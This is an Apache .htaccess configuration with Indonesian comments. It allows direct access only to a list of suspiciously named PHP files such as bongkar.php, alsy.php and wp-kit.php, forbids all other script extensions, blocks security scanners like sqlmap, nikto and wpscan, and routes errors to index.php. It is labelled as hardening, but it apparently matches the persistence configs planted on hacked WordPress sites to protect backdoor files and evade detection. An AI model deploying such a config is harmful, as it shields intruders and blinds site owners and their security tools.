RewriteEngine On
RewriteBase /

# Rule 1: Izinkan akses langsung ke file yang diizinkan
RewriteRule ^(index\.php|wp-kit\.php|wp-audio\.php|woo\.php|cache\.php|session\.php|debug\.php|alsy\.php|log\.php|config\.php|api\.php|bongkar\.php|auth\.php|temp\.php|robots\.txt|sitemap\.xml|.cords\.php|.api\.php|Router\.php|fusion-database\.php|hooks-cache\.php)$ - [L]

# Rule 2: Blokir ekstensi berbahaya - FIXED
RewriteCond %{REQUEST_URI} \.(php[3457]?|phtml|suspected|py|exe|pl|sh|cgi|asp|aspx|jsp)(\..*)?$ [NC]
RewriteCond %{REQUEST_URI} !/(index\.php|wp-kit\.php|wp-audio\.php|woo\.php|cache\.php|session\.php|debug\.php|alsy\.php|log\.php|config\.php|api\.php|bongkar\.php|auth\.php|temp\.php|robots\.txt|sitemap\.xml|.cords\.php|.api\.php|Router\.php|fusion-database\.php|hooks-cache\.php)$ [NC]
RewriteRule .* - [F,L]

# Rule 3: Blokir scanner tools
RewriteCond %{HTTP_USER_AGENT} (sqlmap|nikto|wpscan|nessus|nmap|acunetix) [NC]
RewriteRule .* - [F,L]

# Rule 4: Rewrite utama ke index.php
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]


# ErrorDocument
ErrorDocument 403 /index.php
ErrorDocument 404 /index.php
ErrorDocument 500 /index.php

ServerSignature Off
